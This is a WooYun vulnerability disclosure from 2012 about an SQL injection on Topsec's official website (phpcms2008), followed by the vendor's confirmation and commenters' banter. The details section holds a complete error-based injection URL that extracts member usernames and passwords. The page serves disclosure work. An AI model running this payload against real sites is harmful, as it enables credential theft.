当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-06387

漏洞标题:天融信官网某注射

相关厂商:天融信

漏洞作者: kobin97

提交时间:2012-04-25 20:45

修复时间:2012-06-09 20:46

公开时间:2012-06-09 20:46

漏洞类型:SQL注射漏洞

危害等级:低

自评Rank:5

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-04-25: 细节已通知厂商并且等待厂商处理中
2012-04-26: 厂商已经确认,细节仅向厂商公开
2012-05-06: 细节向核心白帽子及相关领域专家公开
2012-05-16: 细节向普通白帽子公开
2012-05-26: 细节向实习白帽子公开
2012-06-09: 细节向公众公开

简要描述:

天融信官网某注射

详细说明:

phpcms2008
暴错注射
http://www.topsec.com.cn/flash_upload.php?modelid=1%20and%20%28select%201%20from%28select%20count%28*%29,concat%280x7c,%28select%20concat%28username,0x7c,password%29%20from%20trx_member%20limit%200,1%29,0x7c,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%20limit%200,1%29a%29%23

漏洞证明:

修复方案:

您懂得!

版权声明:转载请注明来源 kobin97@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2012-04-26 08:17

厂商回复:

第三方程序的问题,感谢kobin97报告此漏洞。

最新状态:

暂无


漏洞评价:

评论

  1. 2012-04-25 21:12 | 0ps ( 实习白帽子 | Rank:43 漏洞数:10 | xo)

    貌似好多大牛在里面,这个要马克一下

  2. 2012-04-25 23:44 | only_guest 认证白帽子 ( 普通白帽子 | Rank:800 漏洞数:75 | PKAV技术宅社区-专心做技术.PKAV已经暂停...)

    洞主竟然来搞我们公司官网..呵呵..我都没看过呢...

  3. 2012-04-26 00:15 | Lee ( 普通白帽子 | Rank:113 漏洞数:24 | wataru@eviloctal.com)

    从天融信离开的路过。。

  4. 2012-04-26 08:54 | livers ( 实习白帽子 | Rank:94 漏洞数:6 | mov esp,0jmp espcrash.....)

    @Lee 佩服。

  5. 2012-04-26 14:38 | 孤独雪狼 ( 普通白帽子 | Rank:710 漏洞数:145 | 七夕手机被偷,这坑爹的七夕啊 。。。。)

    @only_guest 悲催了吧 哈哈

  6. 2012-04-26 16:05 | only_guest 认证白帽子 ( 普通白帽子 | Rank:800 漏洞数:75 | PKAV技术宅社区-专心做技术.PKAV已经暂停...)

    @孤独雪狼 悲催啥`俺又不是北京总部的`

  7. 2012-04-27 16:55 | kobin97 认证白帽子 ( 核心白帽子 | Rank:1754 漏洞数:190 | 关注网络安全。。)

    修复了么?修得太假了吧? @only_guest 看下。。。

  8. 2012-04-27 18:53 | only_guest 认证白帽子 ( 普通白帽子 | Rank:800 漏洞数:75 | PKAV技术宅社区-专心做技术.PKAV已经暂停...)

    @kobin97 北京总部那边...俺负责不到啊...

  9. 2012-04-27 22:13 | kobin97 认证白帽子 ( 核心白帽子 | Rank:1754 漏洞数:190 | 关注网络安全。。)

    @only_guest 也可以提下意见呀。。嘻嘻。。。

  10. 2012-04-27 22:35 | only_guest 认证白帽子 ( 普通白帽子 | Rank:800 漏洞数:75 | PKAV技术宅社区-专心做技术.PKAV已经暂停...)

    @kobin97 我漏洞详情都看不到.提什么意见啊.嘿嘿.你可以站内信私M我.

  11. 2012-04-28 09:37 | Lee ( 普通白帽子 | Rank:113 漏洞数:24 | wataru@eviloctal.com)

    @only_guest 那个分支机构的呀?

  12. 2014-05-24 23:45 | secgov ( 路人 | Rank:10 漏洞数:3 | 安全审计,漏洞挖掘,WAF. 揭露漏洞有风险,...)

    天融信也太业余了。